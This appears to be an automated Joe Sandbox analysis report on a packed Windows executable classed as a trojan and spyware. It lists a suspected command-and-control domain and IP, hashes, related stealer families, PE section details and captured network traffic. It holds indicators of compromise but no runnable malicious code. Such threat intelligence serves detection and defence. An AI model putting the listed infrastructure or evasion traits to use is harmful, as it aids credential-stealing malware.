5.101.3.217	home.fiveth5ht.top	Russian Federation		34665	PINDC-ASRU	false
3.218.7.103	httpbin.org	United States		14618	AMAZON-AESUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1581255
Start date and time:	2024-12-27 09:09:13 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 2s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	4
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	OoYYtngD7d.exe renamed because original name is a hash value
Original Sample Name:	ed79b16c404fd4bdc0f3de692cc154ad.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@1/0@8/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 13.107.246.63, 4.245.163.56
Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
5.101.3.217	NWJ4JvzFcs.exe	Get hash	malicious	Unknown	Browse	home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
	EwhnoHx0n5.exe	Get hash	malicious	Unknown	Browse	home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
	PqHnYMj5eF.exe	Get hash	malicious	Unknown	Browse	home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
	qZA8AyGxiA.exe	Get hash	malicious	Unknown	Browse	home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
	4o4t8dO4r1.exe	Get hash	malicious	Unknown	Browse	home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
	xXe4fTmV2h.exe	Get hash	malicious	Unknown	Browse	home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
	lolvgcpX19.exe	Get hash	malicious	Unknown	Browse	home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
	w6cYYyWXqJ.exe	Get hash	malicious	Unknown	Browse	home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
	mBr65h6L4w.exe	Get hash	malicious	Unknown	Browse	home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
	HrIrtCXI3s.exe	Get hash	malicious	Unknown	Browse	home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
3.218.7.103	NWJ4JvzFcs.exe	Get hash	malicious	Unknown	Browse
	EwhnoHx0n5.exe	Get hash	malicious	Unknown	Browse
	PqHnYMj5eF.exe	Get hash	malicious	Unknown	Browse
	YrxiR3yCLm.exe	Get hash	malicious	LummaC	Browse
	qZA8AyGxiA.exe	Get hash	malicious	Unknown	Browse
	Cph7VEeu1r.exe	Get hash	malicious	LummaC	Browse
	DRWgoZo325.exe	Get hash	malicious	LummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, Vidar	Browse
	xXe4fTmV2h.exe	Get hash	malicious	Unknown	Browse
	lolvgcpX19.exe	Get hash	malicious	Unknown	Browse
	w6cYYyWXqJ.exe	Get hash	malicious	Unknown	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
httpbin.org	NWJ4JvzFcs.exe	Get hash	malicious	Unknown	Browse	3.218.7.103
	EwhnoHx0n5.exe	Get hash	malicious	Unknown	Browse	3.218.7.103
	PqHnYMj5eF.exe	Get hash	malicious	Unknown	Browse	3.218.7.103
	YrxiR3yCLm.exe	Get hash	malicious	LummaC	Browse	3.218.7.103
	qZA8AyGxiA.exe	Get hash	malicious	Unknown	Browse	3.218.7.103
	Cph7VEeu1r.exe	Get hash	malicious	LummaC	Browse	3.218.7.103
	3stIhG821a.exe	Get hash	malicious	LummaC	Browse	34.226.108.155
	4o4t8dO4r1.exe	Get hash	malicious	Unknown	Browse	34.226.108.155
	xXe4fTmV2h.exe	Get hash	malicious	Unknown	Browse	3.218.7.103
	lolvgcpX19.exe	Get hash	malicious	Unknown	Browse	3.218.7.103
home.fiveth5ht.top	NWJ4JvzFcs.exe	Get hash	malicious	Unknown	Browse	5.101.3.217
	EwhnoHx0n5.exe	Get hash	malicious	Unknown	Browse	5.101.3.217
	PqHnYMj5eF.exe	Get hash	malicious	Unknown	Browse	5.101.3.217
	qZA8AyGxiA.exe	Get hash	malicious	Unknown	Browse	5.101.3.217
	4o4t8dO4r1.exe	Get hash	malicious	Unknown	Browse	5.101.3.217
	xXe4fTmV2h.exe	Get hash	malicious	Unknown	Browse	5.101.3.217
	lolvgcpX19.exe	Get hash	malicious	Unknown	Browse	5.101.3.217
	w6cYYyWXqJ.exe	Get hash	malicious	Unknown	Browse	5.101.3.217
	mBr65h6L4w.exe	Get hash	malicious	Unknown	Browse	5.101.3.217
	HrIrtCXI3s.exe	Get hash	malicious	Unknown	Browse	5.101.3.217

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
PINDC-ASRU	NWJ4JvzFcs.exe	Get hash	malicious	Unknown	Browse	5.101.3.217
	EwhnoHx0n5.exe	Get hash	malicious	Unknown	Browse	5.101.3.217
	PqHnYMj5eF.exe	Get hash	malicious	Unknown	Browse	5.101.3.217
	qZA8AyGxiA.exe	Get hash	malicious	Unknown	Browse	5.101.3.217
	4o4t8dO4r1.exe	Get hash	malicious	Unknown	Browse	5.101.3.217
	xXe4fTmV2h.exe	Get hash	malicious	Unknown	Browse	5.101.3.217
	lolvgcpX19.exe	Get hash	malicious	Unknown	Browse	5.101.3.217
	w6cYYyWXqJ.exe	Get hash	malicious	Unknown	Browse	5.101.3.217
	mBr65h6L4w.exe	Get hash	malicious	Unknown	Browse	5.101.3.217
	HrIrtCXI3s.exe	Get hash	malicious	Unknown	Browse	5.101.3.217
AMAZON-AESUS	NWJ4JvzFcs.exe	Get hash	malicious	Unknown	Browse	3.218.7.103
	EwhnoHx0n5.exe	Get hash	malicious	Unknown	Browse	3.218.7.103
	PqHnYMj5eF.exe	Get hash	malicious	Unknown	Browse	3.218.7.103
	YrxiR3yCLm.exe	Get hash	malicious	LummaC	Browse	3.218.7.103
	qZA8AyGxiA.exe	Get hash	malicious	Unknown	Browse	3.218.7.103
	Cph7VEeu1r.exe	Get hash	malicious	LummaC	Browse	3.218.7.103
	3stIhG821a.exe	Get hash	malicious	LummaC	Browse	34.226.108.155
	DRWgoZo325.exe	Get hash	malicious	LummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, Vidar	Browse	3.218.7.103
	4o4t8dO4r1.exe	Get hash	malicious	Unknown	Browse	34.226.108.155
	xXe4fTmV2h.exe	Get hash	malicious	Unknown	Browse	3.218.7.103

File type:	PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Entropy (8bit):	7.987236967857271
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% VXD Driver (31/22) 0.00% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	OoYYtngD7d.exe
File size:	4'472'832 bytes
MD5:	ed79b16c404fd4bdc0f3de692cc154ad
SHA1:	10404abae6c82c38676da0478af22103aaaefd56
SHA256:	81d19c557d31608a6be0d419928e30dca063c2a2bb909d03133c15d75f246e56
SHA512:	9547fdda3a7171b02263f911da08cefcebb8fa21d9abe77d5ccebbe26abd670f95b1b71f7052be4f5ba5d4a69fdbd134c45b0aa77b3a0e984a7f3aadb1a38b53
SSDEEP:	98304:dP1o+IPtkJMrlapSlM7hF+SLTXcBTWxyFl:dWcMrQS8F+gTUT
TLSH:	9D263313DF1342A5E708023C5AAB6F897961E7D4294D4A303D3DB73A39B77AC0E84969
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..._.lg...............(..I...p..2...p....... I...@.................................'mD...@... ............................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x1027000
Entrypoint Section:	.taggant
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
DLL Characteristics:	DYNAMIC_BASE
Time Stamp:	0x676CDB5F [Thu Dec 26 04:28:15 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Authenticode Signature

Signature Valid:
Signature Issuer:
Signature Validation Error:
Error Number:
Not Before, Not After
Subject Chain
Version:
Thumbprint MD5:
Thumbprint SHA-1:
Thumbprint SHA-256:
Serial:

Entrypoint Preview

Instruction
jmp 00007FDD7851CF0Ah
hint_nop dword ptr [eax+eax+00h]
add byte ptr [eax], al
add cl, ch
add byte ptr [eax], ah
add byte ptr [eax], al
add byte ptr [esi], al
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ecx], al
or al, byte ptr [eax]
add byte ptr [ebx], al
or al, byte ptr [eax]
add byte ptr [esi], al
or al, byte ptr [eax]
add byte ptr [edx], al
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [esi], al
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add ecx, dword ptr [edx]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax+eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x6dd05f	0x73	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x6dc000	0x1ac	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x708a00	0x688
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xc2574c	0x10	tflagfcm
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0xc256fc	0x18	tflagfcm
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x6db000	0x288a00	e931ae5118f786253ca1242f5ce16fc4	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x6dc000	0x1ac	0x200	c4cc0a99d277570da041ec9f99492c39	False	0.580078125	data	4.576733671182088	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x6dd000	0x1000	0x200	6363462e4ea156e03144265f6be7871e	False	0.166015625	data	1.1763897754724144	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x6de000	0x390000	0x200	be996cdcb0e7b45c50f03e0426feda31	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
tflagfcm	0xa6e000	0x1b8000	0x1b7a00	267cc0cd33b657084f8bcc088931d94b	False	0.9944038553810065	data	7.955569694974701	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
nhxcrbvn	0xc26000	0x1000	0x400	601c36892fced2c735035c3949c7fd1c	False	0.708984375	data	5.829893159496642	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0xc27000	0x3000	0x2200	0525ac9ed0e00c74a6968be626d555c0	False	0.07410386029411764	DOS executable (COM)	0.7846229442501619	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_MANIFEST	0xc2575c	0x152	ASCII text, with CRLF line terminators			0.6479289940828402

Imports

DLL	Import
kernel32.dll	lstrcpy

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 27, 2024 09:10:09.121021986 CET	49707	443	192.168.2.6	3.218.7.103
Dec 27, 2024 09:10:09.121069908 CET	443	49707	3.218.7.103	192.168.2.6
Dec 27, 2024 09:10:09.121155024 CET	49707	443	192.168.2.6	3.218.7.103
Dec 27, 2024 09:10:09.139370918 CET	49707	443	192.168.2.6	3.218.7.103
Dec 27, 2024 09:10:09.139420033 CET	443	49707	3.218.7.103	192.168.2.6
Dec 27, 2024 09:10:10.939881086 CET	443	49707	3.218.7.103	192.168.2.6
Dec 27, 2024 09:10:10.940486908 CET	49707	443	192.168.2.6	3.218.7.103
Dec 27, 2024 09:10:10.940529108 CET	443	49707	3.218.7.103	192.168.2.6
Dec 27, 2024 09:10:10.942054987 CET	443	49707	3.218.7.103	192.168.2.6
Dec 27, 2024 09:10:10.942131996 CET	49707	443	192.168.2.6	3.218.7.103
Dec 27, 2024 09:10:10.943506956 CET	49707	443	192.168.2.6	3.218.7.103
Dec 27, 2024 09:10:10.943607092 CET	443	49707	3.218.7.103	192.168.2.6
Dec 27, 2024 09:10:10.954957962 CET	49707	443	192.168.2.6	3.218.7.103
Dec 27, 2024 09:10:10.954977036 CET	443	49707	3.218.7.103	192.168.2.6
Dec 27, 2024 09:10:11.008431911 CET	49707	443	192.168.2.6	3.218.7.103
Dec 27, 2024 09:10:11.284698009 CET	443	49707	3.218.7.103	192.168.2.6
Dec 27, 2024 09:10:11.285026073 CET	443	49707	3.218.7.103	192.168.2.6
Dec 27, 2024 09:10:11.285094976 CET	49707	443	192.168.2.6	3.218.7.103
Dec 27, 2024 09:10:11.362037897 CET	49707	443	192.168.2.6	3.218.7.103
Dec 27, 2024 09:10:11.362059116 CET	443	49707	3.218.7.103	192.168.2.6
Dec 27, 2024 09:10:13.334467888 CET	49710	80	192.168.2.6	5.101.3.217
Dec 27, 2024 09:10:13.454087973 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:13.454266071 CET	49710	80	192.168.2.6	5.101.3.217
Dec 27, 2024 09:10:13.455463886 CET	49710	80	192.168.2.6	5.101.3.217
Dec 27, 2024 09:10:13.574976921 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:13.575053930 CET	49710	80	192.168.2.6	5.101.3.217
Dec 27, 2024 09:10:13.575066090 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:13.575069904 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:13.575126886 CET	49710	80	192.168.2.6	5.101.3.217
Dec 27, 2024 09:10:13.575161934 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:13.575166941 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:13.575213909 CET	49710	80	192.168.2.6	5.101.3.217
Dec 27, 2024 09:10:13.575248003 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:13.575253010 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:13.575301886 CET	49710	80	192.168.2.6	5.101.3.217
Dec 27, 2024 09:10:13.575351000 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:13.575355053 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:13.575381994 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:13.575411081 CET	49710	80	192.168.2.6	5.101.3.217
Dec 27, 2024 09:10:13.575427055 CET	49710	80	192.168.2.6	5.101.3.217
Dec 27, 2024 09:10:13.694562912 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:13.694571972 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:13.694642067 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:13.694645882 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:13.694700956 CET	49710	80	192.168.2.6	5.101.3.217
Dec 27, 2024 09:10:13.694757938 CET	49710	80	192.168.2.6	5.101.3.217
Dec 27, 2024 09:10:13.694780111 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:13.694785118 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:13.694829941 CET	49710	80	192.168.2.6	5.101.3.217
Dec 27, 2024 09:10:13.737163067 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:13.737284899 CET	49710	80	192.168.2.6	5.101.3.217
Dec 27, 2024 09:10:13.857110023 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:13.857229948 CET	49710	80	192.168.2.6	5.101.3.217
Dec 27, 2024 09:10:13.901129961 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.017071009 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.017393112 CET	49710	80	192.168.2.6	5.101.3.217
Dec 27, 2024 09:10:14.217037916 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.217097044 CET	49710	80	192.168.2.6	5.101.3.217
Dec 27, 2024 09:10:14.457076073 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.457235098 CET	49710	80	192.168.2.6	5.101.3.217
Dec 27, 2024 09:10:14.545536995 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.545804024 CET	49710	80	192.168.2.6	5.101.3.217
Dec 27, 2024 09:10:14.545886040 CET	49710	80	192.168.2.6	5.101.3.217
Dec 27, 2024 09:10:14.576786995 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.576963902 CET	49710	80	192.168.2.6	5.101.3.217
Dec 27, 2024 09:10:14.665507078 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.665523052 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.665596008 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.665611029 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.665618896 CET	49710	80	192.168.2.6	5.101.3.217
Dec 27, 2024 09:10:14.665657043 CET	49710	80	192.168.2.6	5.101.3.217
Dec 27, 2024 09:10:14.665687084 CET	49710	80	192.168.2.6	5.101.3.217
Dec 27, 2024 09:10:14.665697098 CET	49710	80	192.168.2.6	5.101.3.217
Dec 27, 2024 09:10:14.665749073 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.665812016 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.665813923 CET	49710	80	192.168.2.6	5.101.3.217
Dec 27, 2024 09:10:14.665817022 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.665828943 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.665863991 CET	49710	80	192.168.2.6	5.101.3.217
Dec 27, 2024 09:10:14.665898085 CET	49710	80	192.168.2.6	5.101.3.217
Dec 27, 2024 09:10:14.666002035 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.666007042 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.666052103 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.666057110 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.666069984 CET	49710	80	192.168.2.6	5.101.3.217
Dec 27, 2024 09:10:14.666111946 CET	49710	80	192.168.2.6	5.101.3.217
Dec 27, 2024 09:10:14.666412115 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.666415930 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.666424990 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.666429043 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.666457891 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.666476011 CET	49710	80	192.168.2.6	5.101.3.217
Dec 27, 2024 09:10:14.666527987 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.666532993 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.666606903 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.666740894 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.666888952 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.666893005 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.666903019 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.667032003 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.667135954 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.667140007 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.667190075 CET	49710	80	192.168.2.6	5.101.3.217
Dec 27, 2024 09:10:14.667284012 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.667288065 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.667296886 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.667335987 CET	49710	80	192.168.2.6	5.101.3.217
Dec 27, 2024 09:10:14.667368889 CET	49710	80	192.168.2.6	5.101.3.217
Dec 27, 2024 09:10:14.668040991 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.668350935 CET	49710	80	192.168.2.6	5.101.3.217
Dec 27, 2024 09:10:14.696583033 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.697002888 CET	49710	80	192.168.2.6	5.101.3.217
Dec 27, 2024 09:10:14.741153002 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.741192102 CET	49710	80	192.168.2.6	5.101.3.217
Dec 27, 2024 09:10:14.785327911 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.785418987 CET	49710	80	192.168.2.6	5.101.3.217
Dec 27, 2024 09:10:14.785440922 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.785489082 CET	49710	80	192.168.2.6	5.101.3.217
Dec 27, 2024 09:10:14.785583019 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.785634995 CET	49710	80	192.168.2.6	5.101.3.217
Dec 27, 2024 09:10:14.785670042 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.785713911 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.785801888 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.786067963 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.786072969 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.786189079 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.786257982 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.786329985 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.786426067 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.786477089 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.786609888 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.786736012 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.786902905 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.786906958 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.786959887 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.786998034 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.787159920 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.787163973 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.787305117 CET	49710	80	192.168.2.6	5.101.3.217
Dec 27, 2024 09:10:14.787331104 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.787354946 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.787401915 CET	49710	80	192.168.2.6	5.101.3.217
Dec 27, 2024 09:10:14.787429094 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.787434101 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.787492037 CET	49710	80	192.168.2.6	5.101.3.217
Dec 27, 2024 09:10:14.787504911 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.787548065 CET	49710	80	192.168.2.6	5.101.3.217
Dec 27, 2024 09:10:14.787549973 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.787622929 CET	49710	80	192.168.2.6	5.101.3.217
Dec 27, 2024 09:10:14.787635088 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.787638903 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.787678003 CET	49710	80	192.168.2.6	5.101.3.217
Dec 27, 2024 09:10:14.787808895 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.787812948 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.787856102 CET	49710	80	192.168.2.6	5.101.3.217
Dec 27, 2024 09:10:14.787872076 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.787909985 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.788001060 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.788068056 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.788136959 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.788167000 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.788335085 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.788347006 CET	80	49710	5.101.3.217	192.168.2.6
Dec 27, 2024 09:10:14.788350105 CET	80	49710	5.101.3.217	192.168.2.6
